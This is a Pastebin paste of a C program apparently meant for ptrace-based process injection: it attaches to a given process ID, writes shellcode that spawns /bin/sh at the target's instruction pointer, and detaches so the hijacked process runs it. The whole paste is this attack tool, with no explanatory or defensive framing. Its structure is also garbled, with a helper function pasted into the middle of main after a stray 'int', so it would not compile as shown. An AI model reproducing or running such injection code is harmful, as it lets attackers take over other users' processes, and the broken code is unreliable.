Advertisement
Guest User

Pussyfer

a guest
Aug 10th, 2020
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.06 KB | None | 0 0
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <stdint.h>
  5.  
  6. #include <sys/ptrace.h>
  7. #include <sys/types.h>
  8. #include <sys/wait.h>
  9. #include <unistd.h>
  10.  
  11. #include <sys/user.h>
  12. #include <sys/reg.h>
  13.  
  14.  
  15.  
  16. unsigned char shellcode[] = \
  17. "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";
  18.  
  19.  
  20.  
  21.  
  22. int
  23. main (int argc, char *argv[])
  24. {
  25.   pid_t                   target;
  26.   struct user_regs_struct regs;
  27.   int                     syscall;
  28.   long                    dst;
  29.   int                     SHELLCODE_SIZE;
  30.  
  31.  
  32.    
  33.  
  34. SHELLCODE_SIZE = strlen(shellcode);
  35.  
  36.   if (argc != 2)
  37.     {
  38.       fprintf (stderr, "Usage:\n\t%s pid\n", argv[0]);
  39.       exit (1);
  40.     }
  41.   target = atoi (argv[1]);
  42.   printf ("+ Tracing process %d\n", target);
  43.   if ((ptrace (PTRACE_ATTACH, target, NULL, NULL)) < 0)
  44.     {
  45.       perror ("ptrace(ATTACH):");
  46.       exit (1);
  47.     }
  48.   printf ("+ Waiting for process...\n");
  49.   wait (NULL);
  50.  
  51.   int
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59. inject_data (pid_t pid, unsigned char *src, void *dst, int len)
  60. {
  61.   int      i;
  62.   uint32_t *s = (uint32_t *) src;
  63.   uint32_t *d = (uint32_t *) dst;
  64.  
  65.   for (i = 0; i < len; i+=4, s++, d++)
  66.     {
  67.       if ((ptrace (PTRACE_POKETEXT, pid, d, *s)) < 0)
  68.     {
  69.       perror ("ptrace(POKETEXT):");
  70.       return -1;
  71.     }
  72.     }
  73.   return 0;
  74. }
  75.  
  76.  
  77.  
  78.  
  79.  
  80.  
  81. printf ("+ Getting Registers\n");
  82.   if ((ptrace (PTRACE_GETREGS, target, NULL, &regs)) < 0)
  83.     {
  84.       perror ("ptrace(GETREGS):");
  85.       exit (1);
  86.     }
  87.  
  88.   printf ("+ Injecting shell code at %p\n", (void*)regs.rip);
  89.   inject_data (target, shellcode, (void*)regs.rip, SHELLCODE_SIZE);
  90.   regs.rip += 2;         
  91.  
  92.  
  93.  
  94.  
  95.  
  96.  
  97.   printf ("+ Setting instruction pointer to %p\n", (void*)regs.rip);
  98.   if ((ptrace (PTRACE_SETREGS, target, NULL, &regs)) < 0)
  99.     {
  100.       perror ("ptrace(GETREGS):");
  101.       exit (1);
  102.     }
  103.   printf ("+ Run it!\n");
  104.  
  105.   if ((ptrace (PTRACE_DETACH, target, NULL, NULL)) < 0)
  106.     {
  107.       perror ("ptrace(DETACH):");
  108.       exit (1);
  109.     }
  110.   return 0;
  111. }
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement